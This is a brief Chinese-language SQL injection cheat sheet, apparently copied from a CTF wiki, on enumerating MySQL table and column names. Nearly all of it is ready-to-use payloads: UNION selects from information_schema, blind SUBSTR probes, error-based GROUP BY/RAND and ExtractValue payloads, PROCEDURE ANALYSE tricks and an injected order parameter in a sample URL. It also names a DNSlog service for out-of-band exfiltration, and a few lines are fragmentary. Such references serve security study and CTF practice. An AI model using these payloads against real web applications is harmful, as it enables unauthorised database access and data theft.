原网址 : https://wiki.x10sec.org/web/sqli-zh/
表名 ¶
-
union 查询
--MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 */ UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* 列出所有用户自定义数据库中的表 */ SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql'; -
盲注
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' -
报错
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1))); -- 在5.1.5版本中成功。列名 ¶
-
union 查询
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' -
盲注
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' -
报错
-- 在5.1.5版本中成功 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1) -- MySQL 5.1版本修复了 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1))); -
利用
PROCEDURE ANALYSE()-- 这个需要 web 展示页面有你所注入查询的一个字段 -- 获得第一个段名 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() -- 获得第二个段名 1 LIMIT 1,1 PROCEDURE ANALYSE() -- 获得第三个段名 1 LIMIT 2,1 PROCEDURE ANALYSE()
不让你用 “
BENCHMARK 判断执行时间
http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
dnslog 平台:http://ceye.io/
-